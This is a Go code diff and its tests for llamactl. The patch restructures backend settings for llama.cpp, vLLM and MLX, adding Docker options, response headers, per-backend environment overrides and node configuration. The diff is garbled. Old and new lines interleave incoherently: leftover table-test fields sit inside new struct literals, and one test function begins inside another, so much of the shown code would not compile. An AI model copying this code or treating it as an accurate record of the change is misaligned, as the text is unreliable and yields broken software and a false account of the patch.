 // TestVllmBuildCommandArgs_EmptyArrays checks that empty (non-nil) slices do
 // not cause their flags to be emitted.
 func TestVllmBuildCommandArgs_EmptyArrays(t *testing.T) {
 	emptyLists := backends.VllmServerOptions{
 		AllowedOrigins: []string{}, // Empty array should not generate args
 		Middleware:     []string{}, // Empty array should not generate args
 	}
 	built := emptyLists.BuildCommandArgs()
 	for _, flag := range []string{"--allowed-origins", "--middleware"} {
 		if present := testutil.Contains(built, flag); present {
 			t.Errorf("Empty array should not generate argument %q in %v", flag, built)
 		}
 	}
 }
 // TestVllmBuildCommandArgs_PositionalModel checks that the model is emitted
 // as the first, positional argument (never as --model) and that the other
 // options still appear as regular flags.
 func TestVllmBuildCommandArgs_PositionalModel(t *testing.T) {
 	serverOpts := backends.VllmServerOptions{
 		Model:                "microsoft/DialoGPT-medium",
 		Port:                 8080,
 		Host:                 "localhost",
 		TensorParallelSize:   2,
 		GPUMemoryUtilization: 0.8,
 		EnableLogOutputs:     true,
 	}
 	built := serverOpts.BuildCommandArgs()
 	// Check that model is the first positional argument (not a --model flag)
 	modelIsFirst := len(built) != 0 && built[0] == "microsoft/DialoGPT-medium"
 	if !modelIsFirst {
 		t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", built)
 	}
 	// Check that --model flag is NOT present (since model should be positional)
 	if hasModelFlag := testutil.Contains(built, "--model"); hasModelFlag {
 		t.Errorf("Found --model flag, but model should be positional argument in args: %v", built)
 	}
 	// Check other flags
 	if ok := testutil.ContainsFlagWithValue(built, "--tensor-parallel-size", "2"); !ok {
 		t.Errorf("Expected --tensor-parallel-size 2 not found in %v", built)
 	}
 	if ok := testutil.ContainsFlagWithValue(built, "--gpu-memory-utilization", "0.8"); !ok {
 		t.Errorf("Expected --gpu-memory-utilization 0.8 not found in %v", built)
 	}
 	if ok := testutil.Contains(built, "--enable-log-outputs"); !ok {
 		t.Errorf("Expected --enable-log-outputs not found in %v", built)
 	}
 	if ok := testutil.ContainsFlagWithValue(built, "--host", "localhost"); !ok {
 		t.Errorf("Expected --host localhost not found in %v", built)
 	}
 	if ok := testutil.ContainsFlagWithValue(built, "--port", "8080"); !ok {
 		t.Errorf("Expected --port 8080 not found in %v", built)
 	}
 }
--- a/pkg/config/config.go
+++ b/pkg/config/config.go
@@ -1,6 +1,7 @@
 package config
 import (
 	"log"
 	"os"
 	"path/filepath"
 	"runtime"
@@ -10,27 +11,41 @@ import (
 	"gopkg.in/yaml.v3"
 )
 // BackendSettings contains structured backend configuration.
 // One value exists per backend (see the fields of BackendConfig).
 type BackendSettings struct {
 	// Command is the backend executable; LoadConfig defaults it to
 	// "llama-server", "vllm" or "mlx_lm.server" depending on the backend.
 	Command         string            `yaml:"command"`
 	// Args are arguments associated with Command (the vLLM default is ["serve"]).
 	// NOTE(review): presumably placed before instance-specific arguments — confirm at the call site.
 	Args            []string          `yaml:"args"`
 	// Environment maps variable names to values; it can be filled from the
 	// LLAMACTL_<BACKEND>_ENV variables via parseEnvVars.
 	Environment     map[string]string `yaml:"environment,omitempty"`
 	// Docker holds optional Docker settings; the MLX defaults leave it nil.
 	Docker          *DockerSettings   `yaml:"docker,omitempty"`
 	// ResponseHeaders maps header names to values; it can be filled from the
 	// LLAMACTL_<BACKEND>_RESPONSE_HEADERS variables via parseHeaders.
 	ResponseHeaders map[string]string `yaml:"response_headers,omitempty"`
 }
 // DockerSettings contains Docker-specific configuration for a backend.
 type DockerSettings struct {
 	// Enabled toggles Docker usage for the backend; the built-in defaults set it to false.
 	Enabled     bool              `yaml:"enabled"`
 	// Image is the container image reference, e.g. "ghcr.io/ggml-org/llama.cpp:server".
 	Image       string            `yaml:"image"`
 	// Args are Docker arguments; the built-in defaults begin with "run", "--rm", ...
 	// NOTE(review): presumably passed to the docker CLI ahead of the image — confirm at the call site.
 	Args        []string          `yaml:"args"`
 	// Environment maps variable names to values; it can be filled from the
 	// LLAMACTL_<BACKEND>_DOCKER_ENV variables via parseEnvVars.
 	Environment map[string]string `yaml:"environment,omitempty"`
 }
 // BackendConfig contains backend executable configurations
 type BackendConfig struct {
-	// Path to llama-server executable (llama.cpp backend)
+	LlamaCpp BackendSettings `yaml:"llama-cpp"`
-	LlamaExecutable string `yaml:"llama_executable"`
+	VLLM     BackendSettings `yaml:"vllm"`
-
+	MLX      BackendSettings `yaml:"mlx"`
 	// Path to mlx_lm executable (MLX-LM backend)
 	MLXLMExecutable string `yaml:"mlx_lm_executable"`
 	// Path to vllm executable (vLLM backend)
 	VllmExecutable string `yaml:"vllm_executable"`
 }
 // AppConfig represents the configuration for llamactl
 type AppConfig struct {
-	Server     ServerConfig    `yaml:"server"`
+	Server     ServerConfig          `yaml:"server"`
-	Backends   BackendConfig   `yaml:"backends"`
+	Backends   BackendConfig         `yaml:"backends"`
-	Instances  InstancesConfig `yaml:"instances"`
+	Instances  InstancesConfig       `yaml:"instances"`
-	Auth       AuthConfig      `yaml:"auth"`
+	Auth       AuthConfig            `yaml:"auth"`
-	Version    string          `yaml:"-"`
+	LocalNode  string                `yaml:"local_node,omitempty"`
-	CommitHash string          `yaml:"-"`
+	Nodes      map[string]NodeConfig `yaml:"nodes,omitempty"`
-	BuildTime  string          `yaml:"-"`
+	Version    string                `yaml:"-"`
 	CommitHash string                `yaml:"-"`
 	BuildTime  string                `yaml:"-"`
 }
 // ServerConfig contains HTTP server configuration
@@ -44,8 +59,14 @@ type ServerConfig struct {
 	// Allowed origins for CORS (e.g., "http://localhost:3000")
 	AllowedOrigins []string `yaml:"allowed_origins"`
 	// Allowed headers for CORS (e.g., "Accept", "Authorization", "Content-Type", "X-CSRF-Token")
 	AllowedHeaders []string `yaml:"allowed_headers"`
 	// Enable Swagger UI for API documentation
 	EnableSwagger bool `yaml:"enable_swagger"`
 	// Response headers to send with responses
 	ResponseHeaders map[string]string `yaml:"response_headers,omitempty"`
 }
 // InstancesConfig contains instance management configuration
@@ -109,6 +130,11 @@ type AuthConfig struct {
 	ManagementKeys []string `yaml:"management_keys"`
 }
 // NodeConfig describes one entry of the AppConfig.Nodes map.
 type NodeConfig struct {
 	// Address of the node, e.g. "http://192.168.1.10:8080"; LoadConfig inserts
 	// an empty NodeConfig (empty address) for the local node when it is missing.
 	Address string `yaml:"address"`
 	// APIKey is an optional key for the node.
 	// NOTE(review): presumably used to authenticate requests sent to that node — confirm.
 	APIKey  string `yaml:"api_key,omitempty"`
 }
 // LoadConfig loads configuration with the following precedence:
 // 1. Hardcoded defaults
 // 2. Config file
@@ -120,18 +146,51 @@ func LoadConfig(configPath string) (AppConfig, error) {
 			Host:           "0.0.0.0",
 			Port:           8080,
 			AllowedOrigins: []string{"*"}, // Default to allow all origins
 			AllowedHeaders: []string{"*"}, // Default to allow all headers
 			EnableSwagger:  false,
 		},
 		LocalNode: "main",
 		Nodes:     map[string]NodeConfig{},
 		Backends: BackendConfig{
-			LlamaExecutable: "llama-server",
+			LlamaCpp: BackendSettings{
-			MLXLMExecutable: "mlx_lm.server",
+				Command:     "llama-server",
-			VllmExecutable:  "vllm",
+				Args:        []string{},
 				Environment: map[string]string{},
 				Docker: &DockerSettings{
 					Enabled: false,
 					Image:   "ghcr.io/ggml-org/llama.cpp:server",
 					Args: []string{
 						"run", "--rm", "--network", "host", "--gpus", "all",
 						"-v", filepath.Join(getDefaultDataDirectory(), "llama.cpp") + ":/root/.cache/llama.cpp"},
 					Environment: map[string]string{},
 				},
 			},
 			VLLM: BackendSettings{
 				Command: "vllm",
 				Args:    []string{"serve"},
 				Docker: &DockerSettings{
 					Enabled: false,
 					Image:   "vllm/vllm-openai:latest",
 					Args: []string{
 						"run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g",
 						"-v", filepath.Join(getDefaultDataDirectory(), "huggingface") + ":/root/.cache/huggingface",
 					},
 					Environment: map[string]string{},
 				},
 			},
 			MLX: BackendSettings{
 				Command: "mlx_lm.server",
 				Args:    []string{},
 				// No Docker section for MLX - not supported
 			},
 		},
 		Instances: InstancesConfig{
-			PortRange:            [2]int{8000, 9000},
+			PortRange: [2]int{8000, 9000},
-			DataDir:              getDefaultDataDirectory(),
+			DataDir:   getDefaultDataDirectory(),
-			InstancesDir:         filepath.Join(getDefaultDataDirectory(), "instances"),
+			// NOTE: empty strings are set as placeholder values since InstancesDir and LogsDir
-			LogsDir:              filepath.Join(getDefaultDataDirectory(), "logs"),
+			// should be relative path to DataDir if not explicitly set.
 			InstancesDir:         "",
 			LogsDir:              "",
 			AutoCreateDirs:       true,
 			MaxInstances:         -1, // -1 means unlimited
 			MaxRunningInstances:  -1, // -1 means unlimited
@@ -156,9 +215,22 @@ func LoadConfig(configPath string) (AppConfig, error) {
 		return cfg, err
 	}
 	// If local node is not defined in nodes, add it with default config
 	if _, ok := cfg.Nodes[cfg.LocalNode]; !ok {
 		cfg.Nodes[cfg.LocalNode] = NodeConfig{}
 	}
 	// 3. Override with environment variables
 	loadEnvVars(&cfg)
 	// If InstancesDir or LogsDir is not set, set it to relative path of DataDir
 	if cfg.Instances.InstancesDir == "" {
 		cfg.Instances.InstancesDir = filepath.Join(cfg.Instances.DataDir, "instances")
 	}
 	if cfg.Instances.LogsDir == "" {
 		cfg.Instances.LogsDir = filepath.Join(cfg.Instances.DataDir, "logs")
 	}
 	return cfg, nil
 }
@@ -179,6 +251,7 @@ func loadConfigFile(cfg *AppConfig, configPath string) error {
 			if err := yaml.Unmarshal(data, cfg); err != nil {
 				return err
 			}
 			log.Printf("Read config at %s", path)
 			return nil
 		}
 	}
@@ -244,15 +317,125 @@ func loadEnvVars(cfg *AppConfig) {
 		}
 	}
 	// Backend config
-	if llamaExec := os.Getenv("LLAMACTL_LLAMA_EXECUTABLE"); llamaExec != "" {
+	// LlamaCpp backend
-		cfg.Backends.LlamaExecutable = llamaExec
+	if llamaCmd := os.Getenv("LLAMACTL_LLAMACPP_COMMAND"); llamaCmd != "" {
 		cfg.Backends.LlamaCpp.Command = llamaCmd
 	}
-	if mlxLMExec := os.Getenv("LLAMACTL_MLX_LM_EXECUTABLE"); mlxLMExec != "" {
+	if llamaArgs := os.Getenv("LLAMACTL_LLAMACPP_ARGS"); llamaArgs != "" {
-		cfg.Backends.MLXLMExecutable = mlxLMExec
+		cfg.Backends.LlamaCpp.Args = strings.Split(llamaArgs, " ")
 	}
-	if vllmExec := os.Getenv("LLAMACTL_VLLM_EXECUTABLE"); vllmExec != "" {
+	if llamaEnv := os.Getenv("LLAMACTL_LLAMACPP_ENV"); llamaEnv != "" {
-		cfg.Backends.VllmExecutable = vllmExec
+		if cfg.Backends.LlamaCpp.Environment == nil {
 			cfg.Backends.LlamaCpp.Environment = make(map[string]string)
 		}
 		parseEnvVars(llamaEnv, cfg.Backends.LlamaCpp.Environment)
 	}
 	if llamaDockerEnabled := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ENABLED"); llamaDockerEnabled != "" {
 		if b, err := strconv.ParseBool(llamaDockerEnabled); err == nil {
 			if cfg.Backends.LlamaCpp.Docker == nil {
 				cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
 			}
 			cfg.Backends.LlamaCpp.Docker.Enabled = b
 		}
 	}
 	if llamaDockerImage := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_IMAGE"); llamaDockerImage != "" {
 		if cfg.Backends.LlamaCpp.Docker == nil {
 			cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
 		}
 		cfg.Backends.LlamaCpp.Docker.Image = llamaDockerImage
 	}
 	if llamaDockerArgs := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ARGS"); llamaDockerArgs != "" {
 		if cfg.Backends.LlamaCpp.Docker == nil {
 			cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
 		}
 		cfg.Backends.LlamaCpp.Docker.Args = strings.Split(llamaDockerArgs, " ")
 	}
 	if llamaDockerEnv := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ENV"); llamaDockerEnv != "" {
 		if cfg.Backends.LlamaCpp.Docker == nil {
 			cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
 		}
 		if cfg.Backends.LlamaCpp.Docker.Environment == nil {
 			cfg.Backends.LlamaCpp.Docker.Environment = make(map[string]string)
 		}
 		parseEnvVars(llamaDockerEnv, cfg.Backends.LlamaCpp.Docker.Environment)
 	}
 	if llamaEnv := os.Getenv("LLAMACTL_LLAMACPP_RESPONSE_HEADERS"); llamaEnv != "" {
 		if cfg.Backends.LlamaCpp.ResponseHeaders == nil {
 			cfg.Backends.LlamaCpp.ResponseHeaders = make(map[string]string)
 		}
 		parseHeaders(llamaEnv, cfg.Backends.LlamaCpp.ResponseHeaders)
 	}
 	// vLLM backend
 	if vllmCmd := os.Getenv("LLAMACTL_VLLM_COMMAND"); vllmCmd != "" {
 		cfg.Backends.VLLM.Command = vllmCmd
 	}
 	if vllmArgs := os.Getenv("LLAMACTL_VLLM_ARGS"); vllmArgs != "" {
 		cfg.Backends.VLLM.Args = strings.Split(vllmArgs, " ")
 	}
 	if vllmEnv := os.Getenv("LLAMACTL_VLLM_ENV"); vllmEnv != "" {
 		if cfg.Backends.VLLM.Environment == nil {
 			cfg.Backends.VLLM.Environment = make(map[string]string)
 		}
 		parseEnvVars(vllmEnv, cfg.Backends.VLLM.Environment)
 	}
 	if vllmDockerEnabled := os.Getenv("LLAMACTL_VLLM_DOCKER_ENABLED"); vllmDockerEnabled != "" {
 		if b, err := strconv.ParseBool(vllmDockerEnabled); err == nil {
 			if cfg.Backends.VLLM.Docker == nil {
 				cfg.Backends.VLLM.Docker = &DockerSettings{}
 			}
 			cfg.Backends.VLLM.Docker.Enabled = b
 		}
 	}
 	if vllmDockerImage := os.Getenv("LLAMACTL_VLLM_DOCKER_IMAGE"); vllmDockerImage != "" {
 		if cfg.Backends.VLLM.Docker == nil {
 			cfg.Backends.VLLM.Docker = &DockerSettings{}
 		}
 		cfg.Backends.VLLM.Docker.Image = vllmDockerImage
 	}
 	if vllmDockerArgs := os.Getenv("LLAMACTL_VLLM_DOCKER_ARGS"); vllmDockerArgs != "" {
 		if cfg.Backends.VLLM.Docker == nil {
 			cfg.Backends.VLLM.Docker = &DockerSettings{}
 		}
 		cfg.Backends.VLLM.Docker.Args = strings.Split(vllmDockerArgs, " ")
 	}
 	if vllmDockerEnv := os.Getenv("LLAMACTL_VLLM_DOCKER_ENV"); vllmDockerEnv != "" {
 		if cfg.Backends.VLLM.Docker == nil {
 			cfg.Backends.VLLM.Docker = &DockerSettings{}
 		}
 		if cfg.Backends.VLLM.Docker.Environment == nil {
 			cfg.Backends.VLLM.Docker.Environment = make(map[string]string)
 		}
 		parseEnvVars(vllmDockerEnv, cfg.Backends.VLLM.Docker.Environment)
 	}
 	if llamaEnv := os.Getenv("LLAMACTL_VLLM_RESPONSE_HEADERS"); llamaEnv != "" {
 		if cfg.Backends.VLLM.ResponseHeaders == nil {
 			cfg.Backends.VLLM.ResponseHeaders = make(map[string]string)
 		}
 		parseHeaders(llamaEnv, cfg.Backends.VLLM.ResponseHeaders)
 	}
 	// MLX backend
 	if mlxCmd := os.Getenv("LLAMACTL_MLX_COMMAND"); mlxCmd != "" {
 		cfg.Backends.MLX.Command = mlxCmd
 	}
 	if mlxArgs := os.Getenv("LLAMACTL_MLX_ARGS"); mlxArgs != "" {
 		cfg.Backends.MLX.Args = strings.Split(mlxArgs, " ")
 	}
 	if mlxEnv := os.Getenv("LLAMACTL_MLX_ENV"); mlxEnv != "" {
 		if cfg.Backends.MLX.Environment == nil {
 			cfg.Backends.MLX.Environment = make(map[string]string)
 		}
 		parseEnvVars(mlxEnv, cfg.Backends.MLX.Environment)
 	}
 	if llamaEnv := os.Getenv("LLAMACTL_MLX_RESPONSE_HEADERS"); llamaEnv != "" {
 		if cfg.Backends.MLX.ResponseHeaders == nil {
 			cfg.Backends.MLX.ResponseHeaders = make(map[string]string)
 		}
 		parseHeaders(llamaEnv, cfg.Backends.MLX.ResponseHeaders)
 	}
 	// Instance defaults
 	if autoRestart := os.Getenv("LLAMACTL_DEFAULT_AUTO_RESTART"); autoRestart != "" {
 		if b, err := strconv.ParseBool(autoRestart); err == nil {
 			cfg.Instances.DefaultAutoRestart = b
@@ -300,6 +483,11 @@ func loadEnvVars(cfg *AppConfig) {
 	if managementKeys := os.Getenv("LLAMACTL_MANAGEMENT_KEYS"); managementKeys != "" {
 		cfg.Auth.ManagementKeys = strings.Split(managementKeys, ",")
 	}
 	// Local node config
 	if localNode := os.Getenv("LLAMACTL_LOCAL_NODE"); localNode != "" {
 		cfg.LocalNode = localNode
 	}
 }
 // ParsePortRange parses port range from string formats like "8000-9000" or "8000,9000"
@@ -325,6 +513,32 @@ func ParsePortRange(s string) [2]int {
 	return [2]int{0, 0} // Invalid format
 }
 // parseEnvVars reads a comma-separated list of "KEY=value" entries
 // (e.g. "KEY1=value1,KEY2=value2") and stores each pair in envMap.
 // Every entry is whitespace-trimmed as a whole and split at its first "=";
 // entries that contain no "=" are ignored.
 func parseEnvVars(envString string, envMap map[string]string) {
 	if len(envString) == 0 {
 		return
 	}
 	entries := strings.Split(envString, ",")
 	for i := range entries {
 		entry := strings.TrimSpace(entries[i])
 		eq := strings.Index(entry, "=")
 		if eq < 0 {
 			// No separator: not a KEY=value pair.
 			continue
 		}
 		envMap[entry[:eq]] = entry[eq+1:]
 	}
 }
 // parseHeaders parses HTTP headers in format "Name1=value1;Name2=value2"
 // and stores them in envMap (header name -> header value).
 //
 // Each entry is split at its first "="; whitespace around the name and the
 // value is removed so that "X-Foo = bar" yields the header "X-Foo: bar"
 // instead of a name with a trailing space. Entries without "=" or with an
 // empty name are skipped because they cannot form a valid header.
 func parseHeaders(envString string, envMap map[string]string) {
 	if envString == "" {
 		return
 	}
 	for _, entry := range strings.Split(envString, ";") {
 		eq := strings.Index(entry, "=")
 		if eq < 0 {
 			continue
 		}
 		name := strings.TrimSpace(entry[:eq])
 		if name == "" {
 			// A header without a name is meaningless; drop it.
 			continue
 		}
 		envMap[name] = strings.TrimSpace(entry[eq+1:])
 	}
 }
 // getDefaultDataDirectory returns platform-specific default data directory
 func getDefaultDataDirectory() string {
 	switch runtime.GOOS {
@@ -357,6 +571,10 @@ func getDefaultDataDirectory() string {
 // getDefaultConfigLocations returns platform-specific config file locations
 func getDefaultConfigLocations() []string {
 	var locations []string
 	// Use ./llamactl.yaml and ./config.yaml as the default config file
 	locations = append(locations, "llamactl.yaml")
 	locations = append(locations, "config.yaml")
 	homeDir, _ := os.UserHomeDir()
 	switch runtime.GOOS {
--- a/pkg/config/config_test.go
+++ b/pkg/config/config_test.go
@@ -7,6 +7,20 @@ import (
 	"testing"
 )
 // getBackendSettings is a test helper that picks the settings matching
 // backendType ("llama-cpp", "vllm" or "mlx") out of bc. Any other backend
 // type yields a zero-value config.BackendSettings.
 func getBackendSettings(bc *config.BackendConfig, backendType string) config.BackendSettings {
 	if backendType == "llama-cpp" {
 		return bc.LlamaCpp
 	}
 	if backendType == "vllm" {
 		return bc.VLLM
 	}
 	if backendType == "mlx" {
 		return bc.MLX
 	}
 	// Unknown backend type.
 	return config.BackendSettings{}
 }
 func TestLoadConfig_Defaults(t *testing.T) {
 	// Test loading config when no file exists and no env vars set
 	cfg, err := config.LoadConfig("nonexistent-file.yaml")
@@ -117,7 +131,6 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
 		"LLAMACTL_INSTANCE_PORT_RANGE":   "5000-6000",
 		"LLAMACTL_LOGS_DIR":              "/env/logs",
 		"LLAMACTL_MAX_INSTANCES":         "20",
 		"LLAMACTL_LLAMA_EXECUTABLE":      "/env/llama-server",
 		"LLAMACTL_DEFAULT_AUTO_RESTART":  "false",
 		"LLAMACTL_DEFAULT_MAX_RESTARTS":  "7",
 		"LLAMACTL_DEFAULT_RESTART_DELAY": "15",
@@ -150,8 +163,8 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
 	if cfg.Instances.MaxInstances != 20 {
 		t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances)
 	}
-	if cfg.Backends.LlamaExecutable != "/env/llama-server" {
+	if cfg.Backends.LlamaCpp.Command != "llama-server" {
-		t.Errorf("Expected executable '/env/llama-server', got %q", cfg.Backends.LlamaExecutable)
+		t.Errorf("Expected default llama command 'llama-server', got %q", cfg.Backends.LlamaCpp.Command)
 	}
 	if cfg.Instances.DefaultAutoRestart {
 		t.Error("Expected auto restart to be false")
@@ -206,29 +219,6 @@ instances:
 	}
 }
 // TestLoadConfig_InvalidYAML writes a syntactically broken YAML file into a
 // temporary directory and expects LoadConfig to report an error for it.
 func TestLoadConfig_InvalidYAML(t *testing.T) {
 	// Malformed on purpose: unterminated flow sequence under "instances".
 	const brokenYAML = `
 server:
  host: "localhost"
  port: not-a-number
 instances:
  [invalid yaml structure
 `
 	path := filepath.Join(t.TempDir(), "invalid-config.yaml")
 	if writeErr := os.WriteFile(path, []byte(brokenYAML), 0644); writeErr != nil {
 		t.Fatalf("Failed to write test config file: %v", writeErr)
 	}
 	if _, loadErr := config.LoadConfig(path); loadErr == nil {
 		t.Error("Expected LoadConfig to return error for invalid YAML")
 	}
 }
 func TestParsePortRange(t *testing.T) {
 	tests := []struct {
@@ -258,94 +248,259 @@ func TestParsePortRange(t *testing.T) {
 	}
 }
 // Remove the getDefaultConfigLocations test entirely
-func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
+func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
-	// Test that environment variables are properly converted to correct types
+	bc := &config.BackendConfig{
-	testCases := []struct {
+		LlamaCpp: config.BackendSettings{
-		envVar   string
+			Command: "custom-llama",
-		envValue string
+			Args:    []string{"--verbose"},
-		checkFn  func(*config.AppConfig) bool
+			Docker: &config.DockerSettings{
-		desc     string
+				Enabled:     true,
-	}{
+				Image:       "custom-llama:latest",
-		{
+				Args:        []string{"--gpus", "all"},
-			envVar:   "LLAMACTL_PORT",
+				Environment: map[string]string{"CUDA_VISIBLE_DEVICES": "1"},
-			envValue: "invalid-port",
+			},
 			checkFn:  func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default
 			desc:     "invalid port number should keep default",
 		},
-		{
+		VLLM: config.BackendSettings{
-			envVar:   "LLAMACTL_MAX_INSTANCES",
+			Command: "custom-vllm",
-			envValue: "not-a-number",
+			Args:    []string{"serve", "--debug"},
 			checkFn:  func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
 			desc:     "invalid max instances should keep default",
 		},
-		{
+		MLX: config.BackendSettings{
-			envVar:   "LLAMACTL_DEFAULT_AUTO_RESTART",
+			Command: "custom-mlx",
-			envValue: "invalid-bool",
+			Args:    []string{},
 			checkFn:  func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
 			desc:     "invalid boolean should keep default",
 		},
 		{
 			envVar:   "LLAMACTL_INSTANCE_PORT_RANGE",
 			envValue: "invalid-range",
 			checkFn:  func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
 			desc:     "invalid port range should keep default",
 		},
 	}
-	for _, tc := range testCases {
+	// Test llama-cpp with Docker
-		t.Run(tc.desc, func(t *testing.T) {
+	settings := getBackendSettings(bc, "llama-cpp")
-			os.Setenv(tc.envVar, tc.envValue)
+	if settings.Command != "custom-llama" {
-			defer os.Unsetenv(tc.envVar)
+		t.Errorf("Expected command 'custom-llama', got %q", settings.Command)
 	}
 	if len(settings.Args) != 1 || settings.Args[0] != "--verbose" {
 		t.Errorf("Expected args ['--verbose'], got %v", settings.Args)
 	}
 	if settings.Docker == nil || !settings.Docker.Enabled {
 		t.Error("Expected Docker to be enabled")
 	}
 	if settings.Docker.Image != "custom-llama:latest" {
 		t.Errorf("Expected Docker image 'custom-llama:latest', got %q", settings.Docker.Image)
 	}
-			cfg, err := config.LoadConfig("nonexistent-file.yaml")
+	// Test vLLM without Docker
-			if err != nil {
+	settings = getBackendSettings(bc, "vllm")
-				t.Fatalf("LoadConfig failed: %v", err)
+	if settings.Command != "custom-vllm" {
-			}
+		t.Errorf("Expected command 'custom-vllm', got %q", settings.Command)
 	}
 	if len(settings.Args) != 2 || settings.Args[0] != "serve" || settings.Args[1] != "--debug" {
 		t.Errorf("Expected args ['serve', '--debug'], got %v", settings.Args)
 	}
 	if settings.Docker != nil && settings.Docker.Enabled {
 		t.Error("Expected Docker to be disabled or nil")
 	}
-			if !tc.checkFn(&cfg) {
+	// Test MLX
-				t.Errorf("Test failed: %s", tc.desc)
+	settings = getBackendSettings(bc, "mlx")
-			}
+	if settings.Command != "custom-mlx" {
-		})
+		t.Errorf("Expected command 'custom-mlx', got %q", settings.Command)
 	}
 }
 func TestLoadConfig_PartialFile(t *testing.T) {
 	// Test that partial config files work correctly (missing sections should use defaults)
 	tempDir := t.TempDir()
 	configFile := filepath.Join(tempDir, "partial-config.yaml")
-	// Only specify server config, instances should use defaults
+func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) {
-	configContent := `
+	// Test that backend environment variables work correctly
-server:
+	envVars := map[string]string{
-  host: "partial-host"
+		"LLAMACTL_LLAMACPP_COMMAND":        "env-llama",
-  port: 7777
+		"LLAMACTL_LLAMACPP_ARGS":           "--verbose --threads 4",
-`
+		"LLAMACTL_LLAMACPP_DOCKER_ENABLED": "true",
-
+		"LLAMACTL_LLAMACPP_DOCKER_IMAGE":   "env-llama:latest",
-	err := os.WriteFile(configFile, []byte(configContent), 0644)
+		"LLAMACTL_LLAMACPP_DOCKER_ARGS":    "run --rm --network host --gpus all",
-	if err != nil {
+		"LLAMACTL_LLAMACPP_DOCKER_ENV":     "CUDA_VISIBLE_DEVICES=0,OMP_NUM_THREADS=4",
-		t.Fatalf("Failed to write test config file: %v", err)
+		"LLAMACTL_VLLM_COMMAND":            "env-vllm",
 		"LLAMACTL_VLLM_DOCKER_ENABLED":     "false",
 		"LLAMACTL_VLLM_DOCKER_IMAGE":       "env-vllm:latest",
 		"LLAMACTL_VLLM_DOCKER_ENV":         "PYTORCH_CUDA_ALLOC_CONF=max_split_size_mb:512,CUDA_VISIBLE_DEVICES=1",
 		"LLAMACTL_MLX_COMMAND":             "env-mlx",
 	}
-	cfg, err := config.LoadConfig(configFile)
+	// Set env vars and ensure cleanup
 	for key, value := range envVars {
 		os.Setenv(key, value)
 		defer os.Unsetenv(key)
 	}
 	cfg, err := config.LoadConfig("nonexistent-file.yaml")
 	if err != nil {
 		t.Fatalf("LoadConfig failed: %v", err)
 	}
-	// Server config should be from file
+	// Verify llama-cpp environment overrides
-	if cfg.Server.Host != "partial-host" {
+	if cfg.Backends.LlamaCpp.Command != "env-llama" {
-		t.Errorf("Expected host 'partial-host', got %q", cfg.Server.Host)
+		t.Errorf("Expected llama command 'env-llama', got %q", cfg.Backends.LlamaCpp.Command)
 	}
-	if cfg.Server.Port != 7777 {
+	expectedArgs := []string{"--verbose", "--threads", "4"}
-		t.Errorf("Expected port 7777, got %d", cfg.Server.Port)
+	if len(cfg.Backends.LlamaCpp.Args) != len(expectedArgs) {
 		t.Errorf("Expected llama args %v, got %v", expectedArgs, cfg.Backends.LlamaCpp.Args)
 	}
 	if !cfg.Backends.LlamaCpp.Docker.Enabled {
 		t.Error("Expected llama Docker to be enabled")
 	}
 	if cfg.Backends.LlamaCpp.Docker.Image != "env-llama:latest" {
 		t.Errorf("Expected llama Docker image 'env-llama:latest', got %q", cfg.Backends.LlamaCpp.Docker.Image)
 	}
 	expectedDockerArgs := []string{"run", "--rm", "--network", "host", "--gpus", "all"}
 	if len(cfg.Backends.LlamaCpp.Docker.Args) != len(expectedDockerArgs) {
 		t.Errorf("Expected llama Docker args %v, got %v", expectedDockerArgs, cfg.Backends.LlamaCpp.Docker.Args)
 	}
 	if cfg.Backends.LlamaCpp.Docker.Environment["CUDA_VISIBLE_DEVICES"] != "0" {
 		t.Errorf("Expected CUDA_VISIBLE_DEVICES=0, got %q", cfg.Backends.LlamaCpp.Docker.Environment["CUDA_VISIBLE_DEVICES"])
 	}
 	if cfg.Backends.LlamaCpp.Docker.Environment["OMP_NUM_THREADS"] != "4" {
 		t.Errorf("Expected OMP_NUM_THREADS=4, got %q", cfg.Backends.LlamaCpp.Docker.Environment["OMP_NUM_THREADS"])
 	}
-	// Instances config should be defaults
+	// Verify vLLM environment overrides
-	if cfg.Instances.PortRange != [2]int{8000, 9000} {
+	if cfg.Backends.VLLM.Command != "env-vllm" {
-		t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
+		t.Errorf("Expected vLLM command 'env-vllm', got %q", cfg.Backends.VLLM.Command)
 	}
-	if cfg.Instances.MaxInstances != -1 {
+	if cfg.Backends.VLLM.Docker.Enabled {
-		t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
+		t.Error("Expected vLLM Docker to be disabled")
 	}
 	if cfg.Backends.VLLM.Docker.Environment["PYTORCH_CUDA_ALLOC_CONF"] != "max_split_size_mb:512" {
 		t.Errorf("Expected PYTORCH_CUDA_ALLOC_CONF=max_split_size_mb:512, got %q", cfg.Backends.VLLM.Docker.Environment["PYTORCH_CUDA_ALLOC_CONF"])
 	}
 	// Verify MLX environment overrides
 	if cfg.Backends.MLX.Command != "env-mlx" {
 		t.Errorf("Expected MLX command 'env-mlx', got %q", cfg.Backends.MLX.Command)
 	}
 }
 // TestLoadConfig_LocalNode covers how the local node name is resolved:
 // from the built-in default, from the config file, and from the
 // LLAMACTL_LOCAL_NODE environment variable.
 func TestLoadConfig_LocalNode(t *testing.T) {
 	t.Run("default local node", func(t *testing.T) {
 		cfg, err := config.LoadConfig("nonexistent-file.yaml")
 		if err != nil {
 			t.Fatalf("LoadConfig failed: %v", err)
 		}
